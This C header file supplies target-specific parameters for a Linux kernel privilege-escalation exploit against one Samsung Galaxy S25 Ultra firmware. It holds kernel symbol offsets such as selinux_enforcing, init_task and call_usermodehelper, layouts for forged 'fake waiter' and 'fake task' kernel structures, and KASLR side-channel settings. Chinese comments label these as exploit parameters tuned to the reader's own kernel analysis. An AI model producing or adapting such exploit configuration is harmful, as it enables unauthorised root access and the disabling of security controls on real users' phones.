#ifndef OFFSET_H
#define OFFSET_H

// Target: Samsung Galaxy S25 Ultra (SM-S9380)
// Firmware: S9380ZCU1AYA1 / S9380ZHU1AYA1
// Kernel: 6.6.30-android15-8

// 基础镜像定义 (修复 KIMAGE_TEXT_BASE 报错)
#define KIMAGE_TEXT_BASE 0xffffffc080000000ULL
#define P0_PAGE_OFFSET 0xffffff8000000000ULL

// 内核符号偏移量 (基于您的内核分析)
#define CALL_USERMODEHELPER_EXEC_WORK_OFF 0xcf408
#define NOOP_LLSEEK_OFF 0x3a4694
#define COPY_SPLICE_READ_OFF 0x3f10e4
#define CONFIGFS_READ_ITER_OFF 0x46e5f8
#define CONFIGFS_BIN_WRITE_ITER_OFF 0x46eb24
#define ASHMEM_IOCTL_OFF 0xcce300
#define ASHMEM_COMPAT_IOCTL_OFF 0xcce9bc
#define ASHMEM_MMAP_OFF 0xccea10
#define ASHMEM_OPEN_OFF 0xccec30
#define ASHMEM_RELEASE_OFF 0xccecb8
#define ASHMEM_SHOW_FDINFO_OFF 0xcced44
#define ANON_PIPE_BUF_OPS_OFF 0x118e0c8
#define ASHMEM_FOPS_OFF 0x133b148
#define SLIDE_NFULNL_LOGGER_NAME_OFF 0x165539c
#define KMALLOC_CACHES_OFF 0x16c4a30
#define SYSTEM_UNBOUND_WQ_OFF 0x2149e60
#define SLIDE_NFULNL_LOGGER_OBJECT_OFF 0x2151270
#define INIT_TASK_OFF 0x215cd00
#define ASHMEM_MISC_FOPS_OFF 0x2329ef0
#define ROOT_TASK_GROUP_OFF 0x23bed00
#define SELINUX_ENFORCING_OFF 0x2420e9c
#define SLIDE_RANDOM_TABLE_BOOT_ID_DATA_PTR_OFF 0x22e75e8
#define SLIDE_SYSCTL_BOOTID_OFF 0x24c2f28

// 派生镜像地址 (修复 *_IMAGE 报错)
#define SLIDE_NFULNL_LOGGER_NAME_IMAGE (KIMAGE_TEXT_BASE + SLIDE_NFULNL_LOGGER_NAME_OFF)
#define SLIDE_NFULNL_LOGGER_OBJECT_IMAGE (KIMAGE_TEXT_BASE + SLIDE_NFULNL_LOGGER_OBJECT_OFF)
#define SLIDE_RANDOM_TABLE_BOOT_ID_DATA_PTR_IMAGE (KIMAGE_TEXT_BASE + SLIDE_RANDOM_TABLE_BOOT_ID_DATA_PTR_OFF)
#define SLIDE_INIT_TASK_IMAGE (KIMAGE_TEXT_BASE + SLIDE_INIT_TASK_OFF)
#define SLIDE_ROOT_TASK_GROUP_IMAGE (KIMAGE_TEXT_BASE + SLIDE_ROOT_TASK_GROUP_OFF)
#define SLIDE_SYSCTL_BOOTID_IMAGE (KIMAGE_TEXT_BASE + SLIDE_SYSCTL_BOOTID_OFF)

// 漏洞利用参数
#define SLIDE_TRACEFS_EVENT_ID 109
#define SLIDE_TRACEFS_WORKER_CALLER_OFF 0xd7ca0
#define SLIDE_PSELECT_WORD_SHIFT 0

// KSnitch 参数 (修复 SLIDE_KSNITCH_* 报错)
#define SLIDE_KSNITCH_APPENDED_FUTEXES 2048
#define SLIDE_KSNITCH_REPEAT_MEASUREMENT 64
#define SLIDE_KSNITCH_AVERAGE 8

// 物理加载地址
#define P0_PHYS_OFFSET 0x80000000ULL
#define P0_KERNEL_PHYS_LOAD 0x80000000ULL

// FAKE_WAITER 结构偏移 (修复 FAKE_WAITER_* 报错)
#define FAKE_WAITER_TREE_PRIO_OFF 0x18
#define FAKE_WAITER_TREE_DEADLINE_OFF 0x20
#define FAKE_WAITER_PI_TREE_ENTRY_OFF 0x28
#define FAKE_WAITER_PI_TREE_PRIO_OFF 0x40
#define FAKE_WAITER_PI_TREE_DEADLINE_OFF 0x48
#define FAKE_WAITER_TASK_OFF 0x50
#define FAKE_WAITER_LOCK_OFF 0x58
#define FAKE_WAITER_WAKE_STATE_OFF 0x60
#define FAKE_WAITER_WW_CTX_OFF 0x68

// 任务结构偏移 (Kernel 6.6)
#define FAKE_TASK_USAGE_OFF 0x40
#define FAKE_TASK_PRIO_OFF 0x84
#define FAKE_TASK_NORMAL_PRIO_OFF 0x8c
#define FAKE_TASK_TASK_GROUP_OFF 0x348
#define FAKE_TASK_PI_LOCK_OFF 0x90c
#define FAKE_TASK_PI_WAITERS_OFF 0x920
#define FAKE_TASK_PI_TOP_TASK_OFF 0x930
#define FAKE_TASK_PI_BLOCKED_ON_OFF 0x938

// 文件操作结构偏移
#define FOPS_UNLOCKED_IOCTL_OFF 0x48
#define FOPS_COMPAT_IOCTL_OFF 0x50
#define FOPS_MMAP_OFF 0x58
#define FOPS_OPEN_OFF 0x68
#define FOPS_RELEASE_OFF 0x78
#define FOPS_SPLICE_READ_OFF 0xb8
#define FOPS_SHOW_FDINFO_OFF 0xd8

// 页面结构偏移
#define STRUCT_PAGE_SIZE 0x40
#define STRUCT_PAGE_COMPOUND_HEAD_OFF 0x08
#define STRUCT_PAGE_TYPE_OFF 0x30

#endif
